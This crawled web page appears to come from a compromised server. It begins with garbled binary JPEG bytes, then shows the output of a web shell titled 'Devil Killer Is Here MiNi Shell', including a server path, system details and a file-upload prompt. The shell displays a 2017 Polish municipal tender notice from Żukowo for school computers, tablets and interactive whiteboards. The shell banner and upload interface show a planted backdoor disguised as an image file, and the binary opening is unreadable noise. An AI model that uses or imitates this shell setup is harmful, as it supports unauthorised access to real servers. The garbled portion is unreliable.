JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170330/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170330/55291-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.zukowo.pl/Article/id,2038.html ' target='_blank'>http://bip.zukowo.pl/Article/id,2038.html </a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 55291 - 2017
              z dnia 2017-03-30 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Żukowo: Dostawa sprzętu komputerowego oraz pomocy naukowych w celu realizacji zajęć dydaktycznych w ramach projektu Dzieciaki Bystrzaki realizowanego na terenie gminy Żukowo, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020, Poddziałanie 3.2.1 Jakość edukacji ogólnej, Działanie 3.2 Edukacja ogólna, Oś Priorytetowa 3. Edukacja.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Projekt współfinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020  Dzieciaki Bystrzaki. Oś priorytetowa: 03 Edukacja, Działanie: 03.02 Edukacja Ogólna, Poddziałanie: 03.02.01 Jakość Edukacji Ogólnej. Nr projektu: RPPM.03.02.01-22-0082/15</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Żukowo, krajowy numer identyfikacyjny
              , ul.
              ul. Gdańska 
              52,
              83330  
              Żukowo, woj.
              pomorskie, państwo
              Polska, tel.
              +48 58 6858300, e-mail
              ugzukowo@zukowo.pl, faks
              +48 58 6858300.
              <br />
              Adres strony internetowej (URL): www.zukowo.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.zukowo.pl/Article/id,2038.html </div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.zukowo.pl/Article/id,2038.html </div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w formie pisemnej. Wykonawca winien zamieścić ofertę w kopercie, która będzie posiadała oznaczenie   OFERTA  DOSTAWA  SPRZĘTU  KOMPUTEROWEGO   ORAZ  POMOCY  NAUKOWYCH. Nr sprawy: ZP.271.12.2017 . Koperta oferty powinna uniemożliwiać odczytanie zawartości, być zamknięta i zabezpieczona w sposób uniemożliwiający jej bezśladowe otwarcie.<br />
                Adres:
                <br />Gmina Żukowo, ul. Gdańska 52, 83-330 Żukowo. Biuro Obsługi Klienta - pok. 3.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa sprzętu komputerowego oraz pomocy naukowych w celu realizacji zajęć dydaktycznych w ramach projektu Dzieciaki Bystrzaki realizowanego na terenie gminy Żukowo, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020, Poddziałanie 3.2.1 Jakość edukacji ogólnej, Działanie 3.2 Edukacja ogólna, Oś Priorytetowa 3. Edukacja.<br /><b>Numer referencyjny: </b>ZP.271.12.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Dostawa sprzętu komputerowego oraz pomocy naukowych w celu realizacji zajęć dydaktycznych w ramach projektu Dzieciaki Bystrzaki realizowanego na terenie gminy Żukowo, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020, Poddziałanie 3.2.1 Jakość edukacji ogólnej, Działanie 3.2 Edukacja ogólna, Oś Priorytetowa 3. Edukacja.
2.	Zamawiający dokonał podziału zamówienia na następujące części:
Część 1  dostawa tablic interaktywnych  18 szt., projektorów multimedialnych  18 szt.; 
Część 2  dostawa tabletów  44 szt., komputerów przenośnych (laptopów)  43 szt.;
Część 3 	dostawa wraz z montażem i rozmieszczeniem pracowni terminalowej  1 kpl., dostawa szafy do ładowania tabletów -  1 szt., dostawa  urządzeń pomiarowych  5 kpl.

Wszystkie dostarczone urządzenia / oprogramowanie winny być zgodne z koncepcją uniwersalnego projektowania opartego na ośmiu regułach: 
1) Użyteczność dla osób o różnej sprawności. 
2) Elastyczność w użytkowaniu. 
3) Proste i intuicyjne użytkowanie. 
4) Czytelna informacja. 
5) Tolerancja na błędy. 
6) Wygodne użytkowanie bez wysiłku. 
7) Wielkość i przestrzeń odpowiednie dla dostępu i użytkowania. 
8) Percepcja równości.
Urządzenia /  oprogramowanie powinny być dostosowane do potrzeb wszystkich użytkowników oraz zapewniać dostępność dla osób niepełnosprawnych.


<br /><br /><b>II.5) Główny kod CPV: </b><br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b>1.	Zamawiający wymaga realizacji zamówienia  w terminie: 
Część 1  do 15 dni licząc od daty zawarcia umowy:
Część 2  do 15 dni licząc od daty zawarcia umowy;
Część 3  do 24 dni licząc od daty zawarcia umowy (termin maksymalny).
2.	Wykonawca dostarczy sprzęt odrębnie dla każdej szkoły. Wykaz szkół został podany w Załączniku nr 1 do SIWZ. 
3.	W przypadku Części 3 termin realizacji zamówienia stanowi kryterium oceny ofert i zostanie ustalony w wyniku postępowania na podstawie złożonej przez wykonawcę oferty.
4.	Podane terminy są maksymalnymi. Zamawiający dopuszcza możliwość wcześniejszego zrealizowania każdej z części  zamówienia. 
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisu warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisu warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisu warunku w tym zakresie.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1)	Karty katalogowe: tablica interaktywna, projektor multimedialny, tablet, komputer przenośny (laptop), terminale pracowni komputerowej, urządzenia pomiarowe;
2)	Tablica interaktywna:
- oświadczenie, że w Polsce jest autoryzowany przez producenta tablicy serwis certyfikowany zgodnie z normą ISO 9001:2000 lub ma Certyfikat ISO 9001:2008 w zakresie urządzeń audiowizualnych;
3)	Projektor multimedialny: 
- oświadczenie, że w Polsce jest autoryzowany przez producenta projektora serwis, który posiada Certyfikat ISO 9001:2008 w zakresie urządzeń audiowizualnych;
4)	Tablet:
- oświadczenie producenta poświadczające, że w przypadku nie wywiązania się z zobowiązań gwarancyjnych oferenta lub firmy serwisującej, producent przejmie na siebie wszelkie zobowiązania gwarancyjne,
- oświadczenie o możliwości rejestracji zdarzenia serwisowego na stronie internetowej producenta urządzenia, możliwość weryfikacji statusu po podaniu modelu oraz numeru seryjnego urządzenia - należy podać adres strony internetowej,
- oświadczenie producenta urządzenia, że oferowany sprzęt pochodzi z legalnego kanału dystrybucyjnego na rynku polskim i jest dopuszczony do obrotu na terenie Unii Europejskiej, 
- certyfikat CE;
5)	Komputer przenośny (laptop):
- oświadczenie, że serwis urządzeń będzie realizowany przez producenta lub autoryzowanego partnera serwisowego producenta oraz wskazanie autoryzowanego serwisu,
- oświadczenie, że serwis urządzeń będzie  realizowany zgodnie z wymogami normy ISO9001,  
- oświadczenie, o posiadaniu przez producenta okna czasowego dla zgłaszania usterek min wszystkie dni robocze w godzinach od 8:00 do 17:00,  zgłoszenie serwisowe przyjmowane poprzez stronę www lub telefoniczne oraz podanie numeru telefonu lub adresu strony internetowej,
- Certyfikat ISO 9001:2000 dla producenta sprzętu, 
- Certyfikat ISO 14001 dla producenta sprzętu, 
- Certyfikat potwierdzający poprawną współpracę oferowanego modelu komputera z systemem operacyjnym,
- potwierdzenie zgodności  modelu komputera z normą Energy Star 5.0  - wydruk ze strony Energy Star,
- Deklaracja zgodności CE, 
- zdjęcie obudowy oferowanego komputera przenośnego (laptopa),
- dokumenty potwierdzające wsparcie techniczne producenta:
Bezpieczeństwo: A) Dostęp do aktualizacji systemu BIOS, podręczników użytkownika, najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowane poprzez podanie na dedykowanej stronie internetowej producenta komputera numeru seryjnego lub modelu komputera  dołączyć link strony.
Bezpieczeństwo: B) Możliwość aktualizacji i pobrania sterowników do oferowanego modelu komputera w najnowszych certyfikowanych wersjach przy użyciu dedykowanego darmowego oprogramowania producenta lub bezpośrednio z sieci Internet za pośrednictwem strony www producenta komputera po podaniu numeru seryjnego komputera lub modelu komputera.
Bezpieczeństwo: C) Ogólnopolska, telefoniczna infolinia/linia techniczna producenta komputera, dostępna w czasie obowiązywania gwarancji na sprzęt i umożliwiająca po podaniu numeru seryjnego: zgłoszenie awarii sprzętu, zgłoszenie zapytania technicznego.
6)	Pracownia terminalowa
- oświadczenie producenta  serwera potwierdzające możliwość jednoczesnej pracy do 50 użytkowników terminalowych, 
- certyfikat CE.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Pełnomocnictwo (o ile dotyczy). 
2) W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego każdy wykonawca powinien dołączyć do oferty następujące dokumenty właściwe dla danej części zamówienia:
Część 1  formularz cenowy (Załącznik nr 5.1 do SIWZ);
Część 2  formularz cenowy (Załącznik nr 5.2 do SIWZ) wraz z wydrukami testów;
Część 3  formularz cenowy (Załącznik nr 5.3 do SIWZ) wraz z wydrukami testów.
3) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
Polskiej zamiast dokumentów o których mowa w pkt III.4) ogłoszenia składa dokument lub dokumenty
wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego
likwidacji ani nie ogłoszono upadłości. Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed
upływem terminu składania ofert. 4) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,
nie wydaje się dokumentów o których mowa wyżej, wykonawca składa oświadczenie, ze wskazaniem osoby lub
osób uprawnionych do jego reprezentacji lub oświadczenie osoby, której dokument dotyczy, złożone przed
notariuszem lub organem sądowym, administracyjnym albo samorządu zawodowego lub gospodarczego
właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby.
Oświadczenie powinno być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Oferta powinna być zabezpieczona wadium w wysokości
Część 1  2.300,00 PLN (słownie: dwa tysiące trzysta złotych 00/100),
Część 2  2.400,00 PLN (słownie: dwa tysiące czterysta złotych 00/100),
Część 3  3.300,00 PLN (słownie: trzy tysiące trzysta złotych 00/100),
2.	Wadium w formie pieniądza należy wnieść przelewem na konto nr 27 8345 1029 0202 9045 2000 0003  w Banku Spółdzielczym w Tczewie O/Żukowo. Przy wnoszeniu wadium należy powołać się na oznaczenie Dostawa sprzętu komputerowego oraz pomocy naukowych  Część  (podać odpowiedni numer części).
3.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym zamawiającego przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert.
4. Zasady wnoszenia wadium zostały opisane w SIWZ.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
